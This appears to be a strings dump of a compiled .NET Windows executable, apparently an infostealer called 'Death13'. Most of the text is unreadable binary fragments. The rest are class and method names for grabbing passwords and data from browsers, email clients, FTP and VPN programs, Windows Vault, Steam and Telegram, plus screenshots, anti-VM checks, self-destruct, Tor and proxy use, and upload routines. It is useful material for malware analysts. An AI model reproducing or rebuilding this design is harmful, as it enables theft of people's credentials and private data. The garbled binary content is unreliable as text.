!This program cannot be run in DOS mode.
`.rsrc
@.reloc
X ;OX} E
X }^sW !#
X $kvD !
X TT6% w
Xa ASSr
Xa ] +W
Xa 92Wi
Yd" _!
X F6F>
X B=?%
X bCi& L)
k ei6qa ~
A 8a`?a
3]C( b
CMa 2WB^@
a /q;O@
a pIE"@
X 3rY6 ;
%mX Gx
X >o.;
X fB!v
>iba ]T
ZW)G
?A R3Z$a
% kCTa
X JI_
upx 2
(:?.
/4Ta )
Bw 7t
gYa ~>(h@
C i^1]a
a EEy@
p`a uWNi@
tOa yx
U:Jla
@~^a vm
!a A>@
Ta 4j7*@
Pwa }x
a nFZN@
X;a PM
\Os_ HE
5a +]//@
~Ma *\
3a SX=
3 Ya M
&5Ib
`1a |l<v@
}a 2gj
{u xuada
3@a W$
Dz OW'la
X \q!{
CH# Rn
pva {VT
0 "YM?a 5
X ewOh
v{s lm
Xa xi@n JT
'$| Ru
/0sa Y
TbN 5[
Xa +x`Q
Xa 9,2I
X ;d\_
Xa \=Jk e
X Wc_?
X GaNa
wE6 {
Xa 7/OU {k
Xa z('y
X 6Q%N i
Xa l\#^
X o/ce 2a
Xa i>bn $W
X #DdD
Xa 84fD l
Xa a0&< V
NOza 1]
~blc
F6Ha -
:ora 5^7
&\ )+?<a +
}oa e}i
98OI N
\*P,a \Q
T KJqZa
' iN%na d
4 a =6es@
X 2]$Z kN
(|a ,if}@
W QDb#a
t`Ca JS
X rYY-
Xa N\g~
6NK f9
Xa P$#\ .
Xa ~J_L f#
)C@ U
X |yC0
X bi~h
X &m~X
Xa nI+|
a e 3@@
[Ea \,
ja Db<-@
X gnUW Y8
X %TB` B
Xa DjO
Xa #BJ
X G&%'
Xa :8k?
X `4IH
f+^ 8^
fuX 7M
X )e=k l
Xa jN+e N
!1"a (
?a "!n
a &dbd@
2?5/a
-u89
m-3r
Xa h'q
Xa 6Z4X >
Xa 7 h
I(Z )`
X 8-8Y F
X Py$q
X DJv? OF
X IG?p
X qC;S
Xa mD[=
&AVla
L2a _'Zw@
<==wa ?E
`ba T:
sNG\
Xa =bA
)a MR(c@
] x%p:a
&JTa
Xp3; !{
3a z7i|@
4DEa _
Xa V,'W /?
-n& 5\
X rghl yX
Xa ($c
X FR.>
X @f^9
X Jr<^
y=| ((
X I[+s
X >Nj/
Xa o\4/ x1
X j~Ea
3CT m=
Xa >mij
X ^P4r
X 'E~r ,"
X `='[ ;
gTG (K
x Ga 3
Xa w\M2 b]
Xa *P+
Xa 1cuI Y>
Vj1 ;Y
X %3lG
aYZ 26
rDR v(
vKk be
4)w N3
X v^*M sl
X O&CY
#G) b/
Xa 4 Tb
X YO k .
Xa 7Q3V
X _H]-
X wYq\
Xa Fj<r !O
X QDH, 4
Xa [{a[ 5Y
NJ? ln
Xa 0 S8 o
Xa [ <
X R]"g 6O
Xa 0e{O ]
X ~bc^ !
Xa K]8
X x8){
!gh R(
hD= ed
`+n }b
s*r B8
O6# ,K
X q_6: Q
3m }
Xa "9 P
)'q 0W
1*. <w
$2J n_
Gtr #.
eBr ET
Xa V['9
X Wcap
JfN <b
Xa C_Xk
X Y^>"
Xa 4~:x }
Xa F1d
Xa 2G|D
Xa 36<c
X UGU8
X E4@2
X ;EI(
X bLg?
Xa AHC2
JTH n{
X ~J P ?
;?2 N"
X T6EJ
X \$}C
X dLo4
Xa 9d]r oS
X 90#o
X &`1& W[
X ZA\\ 1
Xa 1;&7
5u `\
X bQHd
X 2w@M =
Xa ^e-1
X ,wG[ o4
P, .5Y
^?a _`
8|&O
o~ PU:
C$E 8V
E>P 9e
Xa je#5
Xa :%L+
LHn5
h;;a ;t
4a p>Ng@
nmia D
X y@V{ Jj
Xa P28
X W%R^
ma =9Lr@
,a #_1`@
*b{r 4
X s(:Q wH
4P0 9x
Xa q$j
Xa a!as
Xa u2kD
Xa wkmK
NCi >s
h:! fP
X +W=X
r$C 1N
?8] @i
Xa 4wsC o
v4.0.30319
#Strings
' : C \ e s |
!4!:!T!
#$#-#9#`#i#w#
$.$A$L$
%>%P%`%
&1&:&^&u&
('(H(S(`(
+H+g+q+
+2,;,C,\,i,o,y,
-/-G-f-y-
...F.O.U.^.
","9"@"x"
"M#T#Z#
%U&g&n&
)+)3)G*
<>9__1_10
<Create>b__1_10
<vaultItemCount>5__10
<EnumerateCredentials>d__10
<EnumerateBrowsers>d__10
xaZm70
mfmFA0
bHC3Y0
zB7fY0
<EnumerateCredentials>g__GetVaultElementValue|10_0
<>9__0_0
<EnumerateCredentials>b__0_0
<>c__DisplayClass21_0
<>9__1_0
<PerformAntiVM>b__1_0
<Create>b__1_0
<Collect>b__1_0
<PerformSelfDestruct>b__1_0
<>c__DisplayClass1_0
<>9__12_0
<.ctor>b__12_0
<>9__2_0
<Collect>b__2_0
<>9__13_0
<MatchFiles>b__13_0
<>c__DisplayClass13_0
<EnumerateFiles>b__14_0
<>9__0
<Remove>b__0
<EnumerateExtensionFiles>b__0
<EnumerateCredentials>d__0
<ExtractItems>d__0
hYj1a0
tlTbd0
cVYjd0
mGrvl0
rjIjp0
fLAgx0
<structAddress>5__11
<EnumerateProfiles>d__11
a7TDE1
qyr6L1
q8E0S1
<>9__1_1
<Create>b__1_1
<PerformSelfDestruct>b__1_1
<>9__2_1
<Collect>b__2_1
<MatchFiles>b__13_1
<>9__14_1
<EnumerateFiles>b__14_1
<>8__1
<EnumerateExtensionFiles>d__1
<EnumerateCredentials>d__1
<ExtractFolders>d__1
Nullable`1
IEnumerable`1
Stack`1
Action`1
IEnumerator`1
List`1
u66Gl1
k4kjl1
oABoo1
<>7__wrap1
l5eTr1
ttcYs1
v6z8u1
prNww1
hW7My1
<>m__Finally1
bcR212
HMACSHA512
__StaticArrayInitTypeSize=12
<j>5__12
__StaticArrayInitTypeSize=32
advapi32
Microsoft.Win32
ReadUInt32
ToUInt32
ReadInt32
ToInt32
<get_Children>d__42
x4tn52
g8DPU2
bCDcY2
<>9__1_2
<Create>b__1_2
<PerformSelfDestruct>b__1_2
<decryptedPassword>5__2
<rkPath>5__2
<rk>5__2
<OSMajor>5__2
<count>5__2
<MatchFiles>b__2
<EnumerateCredentials>d__2
Func`2
KeyValuePair`2
Dictionary`2
wsKnk2
<>7__wrap2
vZW_s2
rEAOu2
h_inv2
gGtww2
auaAx2
wPzcx2
<>m__Finally2
xmmDz2
ljnTz2
xCiVz2
<MatchFiles>d__13
<get_Children>d__23
fqYa53
swBp73
bh6zA3
chOtD3
qpSmH3
dnqfK3
h1cFU3
k2BEX3
<>9__1_3
<Create>b__1_3
<rkWinSCP>5__3
<rk>5__3
<OSMinor>5__3
<pCredentials>5__3
<EnumerateCredentials>d__3
jTwuc3
pD8Bg3
<>7__wrap3
tRT4u3
<>m__Finally3
<get_DeepChildren>d__44
FromBase64
ToBase64
UInt64
ReadInt64
ToInt64
zpXb84
pSK1I4
vY3PM4
<>9__1_4
<Create>b__1_4
<VAULT_ITEM>5__4
<browserName>5__4
<n>5__4
<rkApp>5__4
<fs>5__4
pZtud4
<>7__wrap4
bi7gp4
<>9__1_5
<Create>b__1_5
nYGH_5
<roamingDataPath>5__5
<rk>5__5
<vaultCount>5__5
vi6Ef5
<>7__wrap5
ReadUInt16
ToUInt16
ReadInt16
<get_Children>d__26
__StaticArrayInitTypeSize=6
s39AG6
pm6xQ6
<>9__1_6
<Create>b__1_6
<rkSession>5__6
<guidAddress>5__6
lBE2d6
<>7__wrap6
oNfP27
zPjb47
VAULT_ITEM_WIN7
VaultGetItem_WIN7
wMrXT7
<>9__1_7
<Create>b__1_7
<vaultSchema>5__7
xqCs_7
iS_8j7
u6mxl7
<>7__wrap7
jRy8x7
<EnumerateBrowsers>d__18
e8Vn68
get_UTF8
EncodeUTF8
kLmBM8
VAULT_ITEM_WIN8
VaultGetItem_WIN8
m3ldP8
lzKRW8
<>9__1_8
<Create>b__1_8
<i>5__8
<key>5__8
fUg9p8
oa9Lr8
<EnumerateProfiles>d__19
p1NL49
pRa0L9
rNbFP9
<>9__1_9
<Create>b__1_9
<vaultHandle>5__9
gPli_9
l5Edk9
hjQcn9
lpSDq9
ryXX3A
xvQWKA
b0rjVA
sE5AlA
f9huqA
vnZ7sA
uU5C8B
mFZR8B
fA7OCB
mXDEIB
lZqVTB
sYZ7YB
gLA00C
nZf15C
b7GO8C
vqzRHC
x6nWdC
iYYijC
vR4OrC
su6LwC
u7162D
rIdi4D
nDWp9D
VAULT_SCHEMA_ELEMENT_ID
hRQXKD
jzjkKD
hHafOD
jNW7RD
ep7PRD
uzQIXD
kFE9hD
skUihD
tBBwpD
trwkyD
xYSRME
VAULT_ELEMENT_TYPE
auhelE
wUVyuE
sz9lvE
nS6K1F
wBub2F
g5ohIF
ueNlLF
vAI8XF
xuQCYF
eUVucF
d0V8eF
n3itqF
bleKKG
lIGVLG
xFyxQG
rPd6ZG
okhavG
jmNbvG
rrQX4H
nncj4H
n9z7LH
rwymnH
gNOwqH
tE0u7I
ubEVBI
get_ASCII
oelvMI
lwQxOI
oUMUaI
jL2dgI
rKasiI
rcxDoI
eHjAGK
sTShGK
u4qYYK
y5xtYK
ccnxaK
jKGmgK
ewOt1L
zrSm3L
aCTI4L
fUQG5L
jZ0z6L
e3U7aL
gLgRlL
aL0nzL
fgdhCM
jxPrLM
vZFVXM
f7T5eM
kKghoM
rHyQ1N
kpkI4N
sCSK7N
xlx_9N
fFIBAN
q9yzFN
remRNN
pnq_fN
oKeYpN
orvMtN
System.IO
iANwIO
vPARPO
pQquTO
dThRYO
peGnYO
v3zHZO
hWrGbO
r0aLdO
qS2xdO
sXftiO
j4HzoO
jWiztO
gvvfwO
v2pTzO
ytYi0P
vqybHP
h7fDIP
fXXCNP
z6q1XP
cQMv9Q
eXBfCQ
rImOHQ
oEK3LQ
uHMMOQ
kdkgSQ
rsna0R
bQrj7R
cj5AKR
qYAESR
g5yTSR
izV4WR
fUGBXR
tyZhaR
g1XdeR
g7tfuR
unymyR
nwbcLS
ovm3MS
ihbYXS
nxLxdS
c8hYeS
cvrNlS
kCypoS
z20GrS
tEdXtS
VAULT_ITEM_ELEMENT
d2LuWT
xVw_gT
qNWEsT
iW6EwT
muh8yT
zUy19U
vmmvBU
sPPQNU
j6YLaU
wvxtzU
mqBK0V
eTQb2V
vhdE9V
udNqHV
get_IV
GenerateIV
dlZgNV
zoTsaV
eSQEeV
njbepV
dkCRsV
mwxHAW
slOjRW
oRMXdW
kjQtkW
uWna1X
qCj52X
lUtR4X
pChzWX
fKDPbX
k8uyhX
fFSZrX
iwv6tX
tn05uX
i_Wo3Y
yRYM5Y
u9GO7Y
mqjRDY
zs9fGY
jh7EHY
oes5PY
ib1PQY
nLhyTY
jyFlaY
qHwBkY
cnCluY
xzzx0Z
xOid6Z
mH0l9Z
lhxlSZ
sQM8_Z
anQ9bZ
oojndZ
suHfjZ
bC2otZ
eNVAzZ
ulSv2_
ahXf9_
tZsGN_
cgISP_
t0k6U_
value__
cqxMp_
o8uou_
i4dv5a
xI5O8a
DownloadData
UploadData
ProtectedData
EncryptData
tb2Zza
rcPDDb
k2bnOb
uizrXb
ym0Qib
Isxfpambzwhhrafyuescib
mscorlib
CredentialBlob
eB_Owb
jo94zb
xyHQ7c
qNUV8c
wQbqFc
sPZ8Hc
q9lIMc
xvn3Sc
m_hb_c
yG7Hic
IsNumeric
System.Collections.Generic
Microsoft.VisualBasic
aIndentInc
ExtractFileAsync
AddStreamAsync
evBHtc
cgF4yc
vNsy2d
get_Id
set_Id
SchemaId
schemaId
get_CurrentManagedThreadId
<>l__initialThreadId
SchemaElementId
uSxWQd
Thread
add_DomainUnload
Download
torUpload
c2Iqcd
RijndaelManaged
get_IsAttached
gcvhed
LastModified
IsInstalled
Undefined
get_HasExited
pPackageSid
get_IsValid
vaultGuid
NewGuid
GetField
TrimEnd
ReadToEnd
AppEnd
ExecuteCommand
Append
get_Second
Method
wBDRrd
WriteEndRecord
WriteCentralDirRecord
get_Password
set_Password
DecryptOutlookPassword
GetNetworkPassword
u28Fvd
iowE5e
mg0sBe
j4MsDe
rzlYPe
Replace
IdentityReference
Resource
GetHashCode
set_Mode
FileMode
PaddingMode
CryptoStreamMode
CompressionMode
CipherMode
m_Node
SelectSingleNode
XmlNode
pPNYfe
FromImage
get_Message
get_UILanguage
InputLanguage
bGrVje
uFUfje
kmh1ke
GetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_AsDouble
set_AsDouble
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
vaultHandle
StopBundle
Rectangle
Single
AddFile
ParseFile
ExtractFile
get_Profile
set_Profile
<>3__profile
IsInRole
WindowsBuiltInRole
Console
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_OSName
get_CPUName
get_GPUName
get_Name
set_Name
get_TwoLetterISOLanguageName
get_FileName
set_FileName
GetTempFileName
GetFileName
get_profileName
set_profileName
get_MachineName
GetElementsByTagName
get_FullName
get_WindowsVersionName
get_UserName
get_BrowserName
set_BrowserName
GetName
TargetName
GetProcessesByName
AssemblyName
pszCredentialFriendlyName
get_DirectoryName
GetDirectoryName
NormalizedFilename
get_Username
set_Username
get_Hostname
set_Hostname
FromFileTime
ToFileTime
DosTimeToDateTime
GetLastWriteTime
SetLastWriteTime
SetCreationTime
DateTimeToDosTime
SetLastAccessTime
ModifyTime
ReadLine
AppendLine
WriteLine
get_NewLine
Combine
LocalMachine
get_Inline
set_Inline
Escape
DataProtectionScope
ValueType
get_DriveType
OfType
SecurityProtocolType
GetType
SocketType
System.Core
PtrToStructure
get_InstalledUICulture
get_Culture
get_InvariantCulture
Capture
ReadOnlyCollectionBase
System.IDisposable.Dispose
TryParse
Reverse
Geolocate
Create
Deflate
CredEnumerate
get_LocalState
set_LocalState
<>1__state
Delete
get_CanWrite
ThreadStaticAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
IteratorStateMachineAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
get_Minute
ReadByte
ToByte
get_Value
set_Value
get_HasValue
TryGetValue
SetValue
set_Expect100Continue
Receive
Remove
get_Size
CredentialBlobSize
CompressedSize
FileSize
get_HashSize
set_BlockSize
chunkSize
get_DiskSize
get_MaximumSize
set_MaximumSize
HeaderSize
get32bitSize
set_KeySize
SuppressFinalize
Resize
cHs66f
jjXV7f
ix5e8f
p7AtIf
PadToMultipleOf
SizeOf
get_ItemOf
LastIndexOf
c7HpUf
sBpRVf
bChvVf
z3hjkf
Igzpuilggiwlvepvmnqrvf
tvIqzf
xX2z2g
pUm4Fg
pngwIg
q5WDUg
eYZkUg
get_Tag
a0TVag
cNWaag
vKLiag
bnC9bg
fBskcg
get_Jpeg
Ilyjyanohmqauisvjcjrig
lvfilg
System.Threading
set_Padding
GetEncoding
System.Drawing.Imaging
IsLogging
System.Runtime.Versioning
FromBase64String
ToBase64String
EscapeDataString
DownloadString
EnumerateToString
get_IsString
GetString
Substring
System.Drawing
get_AsLong
set_AsLong
cvxzsg
eq6x_h
ForEach
IsMatch
pYz3eh
oFi2fh
b6tPkh
ComputeHash
ProcessExecutablePath
CreateFilePath
CreateGrabberZipPath
GetTempPath
GetFolderPath
get_Width
get_Length
set_Length
SetLength
EndsWith
StartsWith
get_Month
mW9TEi
bHd2Ki
qayuKi
txwoQi
x3r9Ui
ob6SVi
Iyatokodeebwyftcijmlji
PtrToStringUni
eCTlsi
w4VByi
lpXM0j
b3oPQj
bw9eRj
bCbCbj
crLHbj
dEukjj
jFPZsj
FlushFinalBlock
TransformFinalBlock
pre1ek
get_CanSeek
xxo2jk
yscSuk
pL814l
hxTTEl
bPHrXl
hDSxXl
Illegal
Marshal
ReadCredential
NativeCredential
Decimal
System.Security.Principal
WindowsPrincipal
get_Model
kernel32.dll
vaultcli.dll
get_IsNull
System.Xml
get_InnerXml
set_SecurityProtocol
get_AsBool
set_AsBool
siaEql
n0Wusl
zXiryl
cRwm8m
w65sBm
j8lNDm
eCAbSm
AddStream
FileStream
DeflateStream
get_EndOfStream
CryptoStream
MemoryStream
zc0hdm
get_Item
set_Item
VaultGetItem
vaultItem
OperatingSystem
get_Algorithm
set_Algorithm
SymmetricAlgorithm
KeyedHashAlgorithm
hWmKim
ICryptoTransform
aDictEnum
aArrayEnum
tR5oxm
t5wyzm
dzu05n
x3Sl8n
cZyEHn
jk80Vn
get_IsBoolean
IsLittleEndian
mjE3dn
CopyFromScreen
get_Children
get_DeepChildren
LastWritten
nZMqgn
AppDomain
get_CurrentDomain
SeekOrigin
lWx7jn
get_Extension
localExtension
get_OSVersion
get_Version
get_BitVersion
System.IO.Compression
get_Application
set_Application
get_Location
get_UserInformation
System.Globalization
System.Reflection
InputLanguageCollection
MatchCollection
GroupCollection
ManagementObjectCollection
get_Position
set_Position
SearchOption
IOException
InvalidDataException
add_UnhandledException
NotSupportedException
ArgumentNullException
ApplicationException
InvalidOperationException
FormatException
ArgumentException
get_ScreenResolution
StringComparison
<>3__json
sbvEsn
SocketShutdown
lOZ2Ao
pVwVEo
ygONGo
plffKo
ufMHOo
vRwDQo
vW8vQo
CopyTo
cjg3do
ReadExtraInfo
CreateExtraInfo
FieldInfo
ReadFileInfo
CultureInfo
DriveInfo
FileSystemInfo
set_StartInfo
ProcessStartInfo
DirectoryInfo
p8qd1p
kapSKp
n8VUOp
hPukSp
Bitmap
tug6fp
pxH1gp
zbcTgp
FilenameInZip
get_Bmp
TimeStamp
ylZNxp
qwpRxp
ibQk0q
iWpFFq
xgL0Mq
bmv4Qq
fhjLcq
Iehyfhmoddekxsjxpmdocq
vmf5eq
System.Linq
get_Linq
gbThrq
spby7r
tq2GMr
y8P6Tr
srQM_r
get_Year
ToChar
DirectorySeparatorChar
DecodeNextChar
get_IsNumber
WriteLocalHeader
StreamReader
TextReader
BinaryReader
AesCryptoServiceProvider
IFormatProvider
get_EscapeBuilder
WriteToStringBuilder
SpecialFolder
Buffer
ServicePointManager
Debugger
ManagementObjectSearcher
SecurityIdentifier
UnhandledExceptionEventHandler
ToUpper
IsUpper
get_Manufacturer
CurrentUser
get_chromeBrowser
set_chromeBrowser
get_firefoxBrowser
set_firefoxBrowser
BinaryWriter
filter
BitConverter
ToLower
kAaYhr
ReadCentralDir
get_Major
get_Minor
set_RedirectStandardError
Authenticator
IEnumerator
m_Enumerator
aEnumerator
ValueEnumerator
LinqEnumerator
ManagementObjectEnumerator
System.Collections.Generic.IEnumerable<System.Text.Json.JSONNode>.GetEnumerator
System.Collections.Generic.IEnumerable<Death13.Recovery.Browsers.Chrome.ChromeProfile>.GetEnumerator
System.Collections.Generic.IEnumerable<Death13.Recovery.Browsers.Firefox.FirefoxProfile>.GetEnumerator
System.Collections.Generic.IEnumerable<Death13.Utils.Models.Extension>.GetEnumerator
System.Collections.Generic.IEnumerable<System.IO.FileInfo>.GetEnumerator
System.Collections.Generic.IEnumerable<Death13.Recovery.Browsers.Chrome.ChromeBrowser>.GetEnumerator
System.Collections.Generic.IEnumerable<Death13.Recovery.Browsers.Firefox.FirefoxBrowser>.GetEnumerator
System.Collections.Generic.IEnumerable<Death13.Utils.Models.Account>.GetEnumerator
System.Collections.IEnumerable.GetEnumerator
KeyEnumerator
.cctor
CreateDecryptor
CreateEncryptor
wO7ysr
passwordVaultPtr
ReadIntPtr
get_Hour
t0nb9s
wLElCs
dXNBas
TargetAlias
Graphics
System.Diagnostics
nFweds
GetBounds
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
DebuggingModes
get_ChildNodes
get_InstalledInputLanguages
Matches
GetDirectories
FetchProxies
cFPjes
EnumerateFiles
MatchFiles
EnumerateExtensionFiles
GetFiles
EnumerateProfiles
NumberStyles
GetNetworkNames
GetSubKeyNames
get_Databases
set_Databases
GetHostAddresses
Attributes
ReadBytes
ReadAllBytes
WriteAllBytes
ToBytes
GetAddressBytes
GetBytes
get_Values
GetDrives
UpdateCrcAndSizes
SocketFlags
dwFlags
ProcessCommandLineArgs
UnhandledExceptionEventArgs
y3Hygs
<>4__this
e1nwjs
bOytks
EnumerateCredentials
pCredentials
Equals
VaultEnumerateItems
ExtractItems
System.Windows.Forms
Contains
Conversions
System.Text.RegularExpressions
get_Locations
set_Locations
System.Collections
StringSplitOptions
RegexOptions
get_Patterns
set_Patterns
get_Groups
get_Chars
ExtractFolders
RuntimeHelpers
EnumerateBrowsers
aupVss
FileAccess
get_Success
Process
get_torprocess
set_torprocess
IPAddress
get_IpAddress
set_IpAddress
System.Net.Sockets
VaultEnumerateVaults
pPropertyElements
set_Arguments
get_Exists
rgfwxs
get_Keys
l3bxzs
c6B91t
RemoveAt
ElementAt
iyn7Kt
iP3BWt
pKgLXt
lun3Yt
Concat
AppendFormat
ImageFormat
get_AsFloat
set_AsFloat
m_Object
ManagementBaseObject
get_AsObject
get_IsObject
ManagementObject
Select
Collect
Connect
Unprotect
HandleSelfDestruct
CreateOrGet
System.Net
Socket
System.Collections.IEnumerator.Reset
GetFileOffset
HeaderOffset
offset
get_Height
op_Implicit
op_Explicit
set_DefaultConnectionLimit
WaitForExit
add_ProcessExit
psaHlt
get_Salt
set_Salt
VaultOpenVault
get_Default
SingleOrDefault
GetValueOrDefault
FirstOrDefault
tKahmt
UnsignedInt
GetBytesFromInt
get_AsInt
set_AsInt
aIndent
WebClient
System.Management
pResourceElement
ParseElement
XmlElement
pAuthenticatorElement
get_DocumentElement
pIdentityElement
Comment
Environment
XmlDocument
get_Parent
System.Collections.Generic.IEnumerator<System.Text.Json.JSONNode>.Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Chrome.ChromeProfile>.Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Firefox.FirefoxProfile>.Current
System.Collections.Generic.IEnumerator<Death13.Utils.Models.Extension>.Current
System.Collections.Generic.IEnumerator<System.IO.FileInfo>.Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Chrome.ChromeBrowser>.Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Firefox.FirefoxBrowser>.Current
System.Collections.Generic.IEnumerator<Death13.Utils.Models.Account>.Current
System.Collections.IEnumerator.Current
System.Collections.Generic.IEnumerator<System.Text.Json.JSONNode>.get_Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Chrome.ChromeProfile>.get_Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Firefox.FirefoxProfile>.get_Current
System.Collections.Generic.IEnumerator<Death13.Utils.Models.Extension>.get_Current
System.Collections.Generic.IEnumerator<System.IO.FileInfo>.get_Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Chrome.ChromeBrowser>.get_Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Firefox.FirefoxBrowser>.get_Current
System.Collections.Generic.IEnumerator<Death13.Utils.Models.Account>.get_Current
System.Collections.IEnumerator.get_Current
GetCurrent
<>2__current
IPEndPoint
get_Count
AttributeCount
vaultItemCount
get_IterationCount
set_IterationCount
dwPropertiesCount
vaultCount
get_RAMAmount
MakeScreenshot
GetPathRoot
Decrypt
ThreadStart
TrimStart
AppStart
Convert
UnsignedShort
XmlNodeList
Persist
get_Host
get_StandardOutput
set_RedirectStandardOutput
jp7qwt
MoveNext
System.Text
ToUTF8Text
ReadText
WriteAllText
get_InnerText
iMmB6u
jbCTEu
hy57Fu
t7SAFu
sjPeFu
oKGaVu
Iikktpsoillhazemdlghmu
xTuewu
sdCf0v
ifGdHv
tEDlYv
n38Bhv
no3zmv
oid26w
dQbUNw
get_Now
set_CreateNoWindow
nvMcxw
rvRd7x
b3r5Ox
sisZUx
Irvkzlddurflvzscefwkax
y1Yedx
rnGGsx
ue2myx
nOO5zx
nN_57y
conoQy
get_Day
m_Array
ProtectedArray
ConvertHexStringToByteArray
InitializeArray
ToArray
ToCharArray
get_AsArray
get_IsArray
rAKUcy
oQPqcy
get_IsReady
get_bundleIsReady
get_Key
set_Key
CreateSubKey
OpenSubKey
get_MasterKey
set_MasterKey
GetMasterKey
HasKey
ContainsKey
RegistryKey
System.Security.Cryptography
GetExecutingAssembly
get_AddressFamily
BlockCopy
get_PathAndQuery
get_Directory
get_UserDataDirectory
set_UserDataDirectory
GetTdataDirectory
AddDirectory
get_profileDirectory
set_profileDirectory
CreateDirectory
GetFoxMailDirectory
GetSteamDirectory
get_SystemDirectory
get_ProfilesDirectory
set_ProfilesDirectory
get_RootDirectory
ZipFileEntry
get_Country
set_Country
Registry
get_City
set_City
get_Capacity
set_Capacity
op_Equality
op_Inequality
System.Security
WindowsIdentity
IsNullOrEmpty
rtZuuy
ConnectToSocks5Proxy
pSERzy
wf9O3z
bzQBSz
WrapNonExceptionThrows
asdsdfw3423
asdfsfw3er234
asdf234asdf
fsad234sdaf3
SFw345w5t 2222
$d23bc401-1c9d-42d8-a1e7-6af7b7b18d19
234.234.4322.1234
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.2
Death13.Recovery.Emails.FoxMail+<EnumerateCredentials>d__0, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Emails.Outlook+<EnumerateCredentials>d__3, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Windows.Networks+<EnumerateCredentials>d__2, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Windows.CredentialManager+<EnumerateCredentials>d__3, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Windows.VaultCli+<EnumerateCredentials>d__10, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
yDeath13.Recovery.FTP.Snowflake+<ExtractItems>d__0, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
{Death13.Recovery.FTP.Snowflake+<ExtractFolders>d__1, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.FTP.Snowflake+<EnumerateCredentials>d__2, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.FTP.CoreFTP+<EnumerateCredentials>d__0, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.FTP.FileZilla+<EnumerateCredentials>d__0, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
~Death13.Recovery.FTP.WinSCP+<EnumerateCredentials>d__0, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.VPN.AzireVPN+<EnumerateCredentials>d__1, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.VPN.WindscribeVPN+<EnumerateCredentials>d__0, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.VPN.EarthVPN+<EnumerateCredentials>d__0, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.VPN.NordVPN+<EnumerateCredentials>d__1, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Messengers.Pidgin+<EnumerateCredentials>d__1, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Browsers.Firefox.FirefoxBrowser+<EnumerateBrowsers>d__10, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Browsers.Firefox.FirefoxBrowser+<EnumerateProfiles>d__11, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Browsers.Chrome.ChromeBrowser+<EnumerateBrowsers>d__18, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Browsers.Chrome.ChromeBrowser+<EnumerateProfiles>d__19, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Browsers.Chrome.ChromeExtensions+<EnumerateExtensionFiles>d__1, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
uDeath13.Grabber.FileGrabber+<MatchFiles>d__13, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
uSystem.Text.Json.JSONNode+<get_Children>d__42, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
ySystem.Text.Json.JSONNode+<get_DeepChildren>d__44, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
vSystem.Text.Json.JSONArray+<get_Children>d__23, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
wSystem.Text.Json.JSONObject+<get_Children>d__26, cfvre, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
! M Q"
"!"M"Q#
#!#M#Q$
$!$M$Q&
&!&M&Q(
(!(M(Q*
*!*M*Q=
=!=M=Q@
@!@M@QB
B!BMBQD
